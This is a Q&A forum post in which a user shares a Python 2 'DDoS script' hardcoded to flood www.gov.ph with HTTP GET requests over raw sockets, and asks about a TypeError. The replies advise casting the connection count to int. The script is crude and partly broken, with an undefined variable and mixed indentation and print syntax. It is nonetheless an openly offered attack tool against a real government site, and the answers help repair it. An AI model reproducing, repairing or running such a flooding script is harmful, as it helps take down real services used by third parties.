# I'm getting a "TypeError: an integer is required" message in my script

Tags: typeerror

I'm trying to make a really simple DDoS script in python but I seem to be getting this output:

```
for i in xrange(conn):
TypeError: an integer is required
```

Please help, I don't know why its outputting like this. Thanks.

Here's my script:

```
    #usr/bin/python
"""
"""
import time, socket, os, sys, string, random, subprocess
from flask import Flask
from colorama import *
init()


# useragents = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
version = "0.0.1]"

subprocess.call('clear', shell=True)

def main():
    print(Fore.RED + "\t  ,/         \.  ")
    print("\t ((           )) ")
    print("\t  \`.       ,'   ")
    print("\t   )')     (`(   ")
    print("\t ,'`/       \,`. ")
    print("\t(`-(         )-')")
    print("\t  \-')     (`-/  ")
    print("\t  /`'       `'\  ")
    print("\t (  _       _  ) ")
    print("\t | ( \     / ) | ")
    print("\t |  `.\   /,'  | ")
    print("\t |    `\ /'    | ")
    print("\t (             ) ")
    print("\t  \           /  ")
    print("\t   \         /   ")
    print("\t    `.     ,'    ")
    print("\t      `-.-'      ")
    print("\t             [v" + version)

        print "\nSelect option:"
        print
        print "\t [1] Berry DDoSer"
        print "\t [2] Start Webgui (Currently Still in Beta)"
    print "\n\t [0] Exit"
        print
        print

        choice = raw_input(Fore.BLUE + 'berry > ')
        print

        if choice == '1':
            print ("[!] DDoS Mode Loaded")
            host = 'www.gov.ph'
            port = 80
            conn = raw_input("How many connections do you want to make: ")
            ip = socket.gethostbyname( host )

            def dos():
                ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                try:
                    ddos.connect((host, 80))
                    ddos.send( "GET /%s HTTP/1.1\r\n" % message )
                    ddos.sendto( "GET /%s HTTP/1.1\r\n" % message, (ip, port) )
                    ddos.send( "GET /%s HTTP/1.1\r\n" % message )
                except socket.error, msg:
                    print("[!] [Connection Failed]")
                print("[DDoS Attack Servering on port %s..." + port)
                ddos.close()

            for i in xrange(conn):
                dos()

        if choice == '2':

            app = Flask(__name__)

            @app.route("/")
            def web_start():
                return '''
                <html>
                <head>
                <style>
                body{
                background-color: yellow;
                }
                </style>
                </head>
                <body>
                <center>
                    <h1 style="color: red;">Hello</h1>

                    <button id="testButton">Test button</button>
                    </center>
                </body>
                </html>
                '''

            if __name__ == "__main__":
                app.run()

        if choice == "exit" or choice == '0':
            raw_input("\t[!] Quiting Session...")
            print("\n[!] Session Closed.")
            exit()



if __name__ == '__main__':
    main()
```

Mind the other stuff, the ddos script is with option 1

Answer (score 1, accepted):

`conn` is being read in as a string.   Try casting it as an int.  `xrange(int(conn))`

Comment: I guess it was because `conn` was set to an integer?

Answer (score 1):

I think you should try replacing `xrange(conn)` with `xrange(int(conn)`